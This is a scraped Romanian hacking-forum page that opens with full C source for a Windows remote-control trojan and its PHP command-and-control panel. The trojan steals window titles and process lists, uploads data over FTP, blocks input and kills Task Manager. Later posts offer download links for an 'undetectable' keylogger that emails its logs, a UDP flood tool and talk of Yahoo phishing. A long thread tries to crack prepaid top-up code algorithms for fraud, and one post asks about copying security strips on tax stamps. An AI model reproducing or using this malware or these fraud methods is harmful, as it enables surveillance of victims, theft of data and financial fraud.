puskin

/******************************************************************** PHP TROJAN *********************************************************************/ #pragma optimize("gsy",on) #include <windows.h> #include <wininet.h> #include <stdio.h> #include <WinAble.h> #include <TlHelp32.h> #pragma comment(lib,"wininet.lib") #pragma comment(lib,"winmm.lib") char pcName[256]; char iPcName[256]; char plist[256]; char cmd[256]; char tmp[256]; char className[256]; char *msg; bool killProc(char*procName); bool mon=FALSE; bool banned; HINTERNET hFile; HINTERNET hBan; HINTERNET hInet; HINTERNET sInet; HWND currentWindow; HWND GetFirstWindowText(char buf[],unsigned int max_out,int *text_written); unsigned long len_ComputerName = MAX_COMPUTERNAME_LENGTH + 1; int x; int times; int GetNextWindowText(char buf[],unsigned int max_out,HWND* handle); DWORD sized; DWORD WINAPI clr(LPVOID u); DWORD WINAPI monitor(LPVOID); void phpCmd(char*prm); void clear(); void TypeStr(char*keys) //From [email]Napalm@netcore2k.net[/email](modified a bit so i could understand it) { for(int x=0;x<strlen(keys);x++) { int virtualKey=VkKeyScan(keys[x]); if((virtualKey>>8)&1) keybd_event(VK_LSHIFT,0,0,0); keybd_event((unsigned char)virtualKey,0,0,0); keybd_event((unsigned char)virtualKey,0,KEYEVENTF_KEYUP,0); if((virtualKey>>8)&1) keybd_event(VK_LSHIFT,0,KEYEVENTF_KEYUP,0); } } int WINAPI WinMain( __in HINSTANCE hInstance, __in_opt HINSTANCE hPrevInstance, __in_opt LPSTR lpCmdLine, __in int nShowCmd ) { CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)monitor, (LPVOID) 0, NULL, NULL); GetComputerName(pcName,&len_ComputerName); hInet = InternetOpen(NULL, 1, NULL, NULL, 0); while(1) { memset(cmd,0,256); hFile = InternetOpenUrl(hInet, "http://site/commands.txt", NULL, 0, INTERNET_FLAG_NO_CACHE_WRITE, 0); int ret=InternetReadFile(hFile,cmd,256,&sized); InternetCloseHandle(hFile); if(!_strnicmp(cmd,"msgb",4)) { for(x=0;x<=strlen(cmd);x++) if(cmd[x]==' ') { MessageBox(NULL,&cmd[x+1],"Hacker says:",MB_OK); break; } } if(!_stricmp(cmd,"wubu")) { GetWindowText(GetForegroundWindow(),cmd,256); sprintf(tmp,"send=%s",cmd); phpCmd(tmp); clear(); } if(!_stricmp(cmd,"open cd")) mciSendString("set CDAudio door open", NULL, 0, NULL); if(!_stricmp(cmd,"close cd")) mciSendString("set CDAudio door closed", NULL, 0, NULL); if(!_stricmp(cmd,"darken")) mon=TRUE; if(!_stricmp(cmd,"lighten")) mon=FALSE; if(!_stricmp(cmd,"swap mouse buttons")) SwapMouseButton(true); if(!_stricmp(cmd,"restore mouse buttons")) SwapMouseButton(false); if(!_strnicmp(cmd,"cursor position",strlen("mouse position"))) { for(x=strlen("cursor position");x<=strlen(cmd);x++) if(cmd[x]==' ') { times=atoi(&cmd[x+1]); break; } srand(GetTickCount()); for(x=0;x<=times;x++) { Sleep(1); SetCursorPos(rand()%GetSystemMetrics(SM_CXSCREEN),rand()%GetSystemMetrics(SM_CYSCREEN)); } } if(!_strnicmp(cmd,"setfw",5)) { for(x=strlen("setfw");x<=strlen(cmd);x++) if(cmd[x]==' ') { ShowWindow(FindWindow(NULL,&cmd[x+1]),true); SetForegroundWindow(FindWindow(NULL,&cmd[x+1])); SetFocus(FindWindow(NULL,&cmd[x+1])); break; } } if(!_stricmp(cmd,"close fw")) SendMessage(GetForegroundWindow(),WM_CLOSE,0,0); if(!_stricmp(cmd,"pcname")) { sprintf(tmp,"send=%s",pcName); phpCmd(tmp); } if(!_strnicmp(cmd,"sendString",10)) { for(x=10;x<=strlen(cmd);x++) if(cmd[x]==' ') { TypeStr(&cmd[x+1]); if(cmd[4]=='S') { TypeStr("\n"); } break; } } if(!_strnicmp(cmd,"kill",4)) { for(x=4;x<=strlen(cmd);x++) if(cmd[x]==' ') { killProc(&cmd[x+1]); break; } } if(!_stricmp(cmd,"plist")) { memset(plist,0,256); PROCESSENTRY32 pe32 = {0}; HANDLE hSnapshot = NULL; hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hSnapshot != (HANDLE) -1) { phpCmd("proc=[PSTART]"); pe32.dwSize = sizeof(PROCESSENTRY32); int proc_cnt = 0, thrd_cnt = 0; if(Process32First(hSnapshot, &pe32)) { do { sprintf(plist,"proc=%s ",pe32.szExeFile); phpCmd(plist); Sleep(50); } while(Process32Next(hSnapshot, &pe32)); } phpCmd("proc=[PEND]"); } } if(!_stricmp(cmd,"wlist")) { FILE*f=fopen("list.txt","a"); memset(plist,0,256); currentWindow = GetFirstWindowText(tmp, sizeof(tmp), 0); GetClassName(currentWindow,className,256); sprintf(plist,"%s | Class: %s ",tmp,className); fputs(plist,f); while(currentWindow) { GetNextWindowText(tmp, sizeof(tmp), &currentWindow); GetClassName(currentWindow,className,256); if(*tmp && IsWindowVisible(currentWindow)) { if(strcmp(tmp, "Program Manager")) { sprintf(plist,"%s | Class: %s ",tmp,className); fputs(plist,f); } } } fclose(f); HINTERNET hFtpSession = InternetConnect(hInet,"site",INTERNET_DEFAULT_FTP_PORT, "user","pass", INTERNET_SERVICE_FTP, 0,0 ); FtpPutFile(hFtpSession,"list.txt","site/plist.txt", FTP_TRANSFER_TYPE_BINARY, 0); InternetCloseHandle(hFtpSession); DeleteFile("list.txt"); } if(strcmp(cmd,"")) clear(); Sleep(1000); } InternetCloseHandle(hInet); } void phpCmd(char*prm) { CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)&clr,prm,0,NULL); } void clear() { CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)&clr,"cmd=clr",0,NULL); } DWORD WINAPI clr(LPVOID u) { int len=strlen("http://site/action.php?")+128; char *com=(char*)malloc(len); sprintf(com,"http://site/action.php?%s",u); HINTERNET hInet2 = InternetOpen(NULL, 1, NULL, NULL, 0); HINTERNET hUrl = InternetOpenUrl(hInet2, com, NULL, 0, INTERNET_FLAG_NO_CACHE_WRITE, 0); InternetCloseHandle(hUrl); InternetCloseHandle(hInet2); free(com); ExitThread(0); } DWORD WINAPI monitor(LPVOID) { HWND tmgr; while(1) { Sleep(1); tmgr=FindWindow(NULL,"Windows Task Manager"); if(tmgr!=NULL) SendMessage(tmgr,WM_CLOSE,0,0); if(mon==TRUE) { BlockInput(true); SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2); } else { BlockInput(false); SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) -1); } } ExitThread(0); } bool killProc(char *procName) { HANDLE hProcessSnap; HANDLE hProcess; PROCESSENTRY32 pe32; DWORD dwPriorityClass; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap == INVALID_HANDLE_VALUE) { return(false); } pe32.dwSize = sizeof(PROCESSENTRY32); if(!Process32First(hProcessSnap, &pe32)) { CloseHandle(hProcessSnap); return(false); } do{ if(!_stricmp(pe32.szExeFile, procName)) { hProcess = OpenProcess(PROCESS_TERMINATE,0, pe32.th32ProcessID); if(TerminateProcess(hProcess,0) == ERROR) { return false; } else { return true; } CloseHandle(hProcess); } } while(Process32Next(hProcessSnap, &pe32)); CloseHandle(hProcessSnap); } HWND GetFirstWindowText(char buf[],unsigned int max_out,int *text_written){//From Uranium && crAcker HWND ret_val; ret_val = GetForegroundWindow(); if(!text_written) GetWindowText(ret_val,buf,max_out); else *text_written = GetWindowText(ret_val,buf,max_out); return ret_val; } int GetNextWindowText(char buf[],unsigned int max_out,HWND* handle) //From Uranium && crAcker { *handle = GetNextWindow(*handle,GW_HWNDNEXT); return GetWindowText(*handle,buf,max_out); } WEB FILES: action.php <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Untitled Document</title> </head> <body> <?php function readIt($path) { $file=@fopen($path,"r") or die("File couldn't be open"); while(!feof($file)) echo fgets($file); fclose($file); } if($_GET["cmd"]=="clr") { $file=fopen("commands.txt","w"); fclose($file); } else if(isset($_GET["send"])) { $file=fopen("recived.txt","w"); fwrite($file,$_GET["send"],strlen($_GET["send"])); fclose($file); } else if(isset($_GET["proc"])) { if($_GET["proc"]=="[PSTART]") unlink("plist.txt"); else if($_GET["proc"]=="[PEND]") ; else { $proc=@fopen("plist.txt","a"); fputs($proc,$_GET["proc"],strlen($_GET["proc"])); fclose($proc); } } else { if(strlen($_POST["this"])!=0) { $file=fopen("commands.txt","w"); fwrite($file,$_POST["this"],strlen($_POST["this"])); fclose($file); } if(strlen($_POST["ss"])!=0) { $file=fopen("commands.txt","w"); fwrite($file,"sendString ".$_POST["ss"],strlen($_POST["ss"])+11); fclose($file); } } include("index.htm"); if($_POST["button"]=="read recived") { echo "Recived: "; readIt("recived.txt"); } if($_POST["button"]=="read plist") { echo "Processes: "; readIt("plist.txt"); } if($_POST["button"]=="delete recived") unlink("recived.txt"); if($_POST["button"]=="delete plist") unlink("plist.txt"); if($_POST["button"]=="read cmd") { echo "Command: "; readIt("commands.txt"); } ?> </body> </html> index.htm: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Trojan</title> </head> <body> <form id="form1" name="form1" method="post" action="action.php"> sendString Comm:<input name="ss" type="text" /></p> Trojan commands:<input name="this" type="text" /> </p> Client commands: <input name="button" type="text" /> <input type="submit" name="Submit" value="Go" /> </p> </form> </body> </html> credit: X-N2O

SPAM ai dreptate

abaddon_c buna treaba....thk daca mai aveti postati

a testat careva?

Beast 2.08 keylogger Beast 2.08 este un keylogger nou ce foloseste o metoda "stealth" de "Keyboard hook" este complet nedetectabil si codul sursa este folosit doar la 50% din capacitatea sa (are potential) Cum functioneaza? Ca sa editati setarile server-ului trebuie sa aveti instalat vb6 sa deschideti codul sursa si sa modificati setarile : -limita in Kb la care fisierul Log este trimis pe email; -serverul de SMTP (cautati unul pe portul 25 care sa nu necesite autentificare...) -adresa de email la care sa fie trimis raportul (yahoo, gmail..etc) Server-ul creeaza fisierul de raport in acelasi director in care ruleaza, porneste o data cu windows-ul, verifica conexiunea de internet daca este deschisa sau nu...etc De asemenea are un fisier cu resurse in caz ca sistemul de operare nu are fisierele necesare (comctl32.ocx, msvbvm60.dll, mswinsck.ocx, scrrun.dll...) pe care le copie automat in fisierul de sistem la executie.Close server F12 Download server: http://rapidshare.com/files/113222120/Beast_2.08.exe.html Download source code: http://rapidshare.com/files/112455450/beast208sourcecode.zip.html Beast 2.08 Keylogger Beast 2.08 is a new age keylloger with a stealth method of keyboard hook, it is complete undetect by Av's and the source code is only at 50% of his value exploited. How it's work? To edit the server settings you need to have vb6 and some knowledge of programming.What can be modified: -The limit in kb when the Log file is send on email; -the SMTP address (look for a 25 port with no authorize server) -the email address where the raport log is sent The server create the report file "log" in the same directori where the app" is running, start with windows, check the internet connection if it's open or not.. Have a resource file attached in, in case the system doesn't have the file for running the server(comctl32.ocx, msvbvm60.dll, mswinsck.ocx, scrrun.dll...) this file are copied in sys folder of system on execution.Close server F12

asa este fiseru cu intrebari(raspunsuri) este eronat in proportie de 30%, tabelele sql sunt pline de errori, nu se mai ocupa nimeni ele...daca continua tot asa va fi cel mai mare colaps din gaming-ul media local....au aparut cheat-uri pt. raspunsuri, pt. licitatii, pt. conturi..s.a.m.d Bine ca stiu sa bage reclame cu sila pe gat....

nu se poate decripta????

edededi go to prison break because his a whiskey social drinker...ghghhh si cu asta am dat foc la casa.....

merge numai modem>modem.....nu functioneaza eth0>modem L-am reuploadat eu http://rapidshare.com/files/112262621/RocketV1_0.exe.html

Cum sa faca ca o imprimanta HP sa scaneze(printeze) si elementele de siguranta acele benzi reflectorizante (ex. banda de pe timbru de tigari, de pe cd-uri..etc)???

Un program pt. flodat portile udp..este cam vechi..dar sa fie poate ajuta la ceva... Download: http://rapidshare.com/files/112195589/udpflood.exe.html

treaba e nasoala rau de tot... mi0am verificat si eu id-ul care nu mai merge cica din cauza ca nu a mai fost folosit si tot la fel apare... Phishing dupa conturi de yahoo...s.a.m.d

Si unde as putea sa verific un cod de cosmote ca nu am cartela cosmote.....de ex de unde sa stiu ca este un cod valid cel postat?

Asa este ai dreptate...declar subiect inchis ! END TOPIC! SE POATE STERGE MUTA LA TRASH!

se stie ca electronii (bitzii..informatia ) trece prin porti logice I/O din config. tranzistoarelor din care sunt formate CPU-rile (straturile de metale) oare daca se creaza un cerc virtual electroni trec prin stratul de metal (portile logice I/O) tot in forma de cerc sau linear?????

Ce s-ar intampla daca toATE FISIERELE DE PE hdd AR SUPORTA UN "sELECT aLL" ? Ma refer la globalizarea comenzilor in kernel(sys, folosind versiune de DOS pe care ruleaza sistemul) si efectul lor asupra sistemelor.....ce urmeaza nu vreau sa zic.... astept exemple de instructiuni globalizate in sistem ul windows indiferent de limbaj de programare: ex: -crearea unui director "con" pe toate partitile in DOS (inclsv. STARTUP) SI REACTIILE SISTEMULUI DE OPERARE LA ELE....MULT NOROC SI GOD HELLP US!..cine face asa ceva poate trece direct la unificarea instructiunilor intr-un sistem de operare... P.S:hai sa o dau putin in s.f-uri...ce s-ar intampla daca in lumea virtuala ar fi reprodus experimentul philadelphia (rainbow project) adica sa se ia in calcul fiecare molecula de materie existenta (masa vaporului , a apei, oamenilor...etc), ciclul de miscare a bobinelor, efectul electromagnetic...tot de la a la z ....si sa se scrie intr0un program gen reality game...ar dura cca. 30 de ani de munca dar ce s-ar intampla?????

ORANGE....final destination...cred ca entreprise o sa ajunga la algoritmul lor inaintea mea

uite vezi se poate determina unul din intervale si dupa serie: 25581 25551 _____ 00030

ce te intereseaza...? Clonarea cartelelor? Soft de interceptare convorbiri si sms??? informatii gasesti peste tot ..."gsm-arena" gsm forum..etc Creeaza un topic nou ca sa nu deviem de la discutie aici pls....

mai taie cateva cifre....:))) ia si citeste tot thread-ul si incearca sa intelegi ceva...de ex.prima cifra se repeta Vrei sa tip in gura mare "O sa reincarcati telefoanele poate si cu 400$, o sa aveti acces la site-urile cu plata prepaid..o sa...s.a.m.d" ???? Asta e frauda adusa unor anume terti (societati).Este doar demonstrativ...

Sa zicem ca ar fi asa ce putem deduce: 1. algoritmul se aplica unui numar cincinal (din 5 cifre), daca ar fi asa perioada de evolutie a acestuia ar trebui sa corespunda cu numarul generatiei (seria) si sa aiba un "x" comun si ar fi prea mica din 5 cifre..: 5979021******* 5382********** 58421021******......toate au seria 5 in fata 53527725****** 2.daca este un nr. de 9 si unul de 5, cel de 9 cu antecedentul de 5 il creaza pe urmatorul 5 cine creaza perioada(sirul care nu este random) al numarului format din 9 cifre din fata? se introduce manual nu cred...... 3.Intr-adevar trebuie sa fie declarate pe server asta este....dar de ce caut eu si seriile cartelelor nu te-ai intrebat?? doar nu sa fac colectie dupa serie...cred ca stii cu aproximatie cate cartele sunt in depozite si cate asteapta sa fie vandute...ai seria stii exact unde sa lovesti 4.Nu este deloc imposibil din 3 incercari (open your mind and start learning !) programul o sa contina si un camp de validare-verificare a codului generat si asta multumita existentei site-urilor care accepta plata prin prepaid (mydomain..s.a.m.d) 5.CINE A ZIS CA VREA SA-SI INCARCE TELEFONUL???? :)))) 6.programul nu o sa fie public sa nu va temeti.... 7.ceva util despre servere-le voda...: downl: http://rapidshare.com/files/111956049/2.ZIP.html ASTEPT SA POSTATI CODURILE SI SERIILE PLS...SAU DACA NU E BUN SI CODUL NUMAI..THK!

daca vreti cu adevarat sa ma ajutati va rog postati aici coduri de reincarcare uzate si seriile cartelelor folosite (serie: xxxx cod:xxxx) scuze....merge si de la reincarcare electronica dar e mai greu sa generez variante neconsumate fara sa stiu seria.... P.s: as da niste exemple sa intelegeti si voi cum functioneaza algoritmul dar ma abtin pana e gata programul generator, ca mie frica daca postez indicii aici isi dau seama si schimba algoritmul....spun doar ca e bazat pe perioade alternante (generatii)NU ESTE RANDOM ! Thk's! yoyo2008 o sa fii printe primu care o sai dau programu sa-l testeze Seriile cartelelor nu le ai???

daca vreti intr-adevar sa ma ajutati postati aici seriile si codurile cartelelor folosite la incarcare (uzate)

Unul din producatorii de algoritmi pentru cartelele de reincarcare a fost societatea: "AIR-IT Romania" cu sediul in bucuresti Str. Ion Câmpineanu, nr. 24, bloc 18B, parter, Sector 1, Bucureºti, 010039. Director general: Elena Tãnase Telefon: +4 031 105 08 8 Fax: +4 031 105 08 8 Email: [email]office@air-it.ro[/email] Web: [url]www.air-it.ro[/url] in prezent nu stiu cine dezvolta aceste aplicatii sau daca aplicatia aste aceeasi cu cea veche...o sa revin cu, sursa algoritmului de generare si validare Multumesc mult lui C**** fost angajat al companiei care mi-a furnizat informatiile necesare te pup!

reupload pls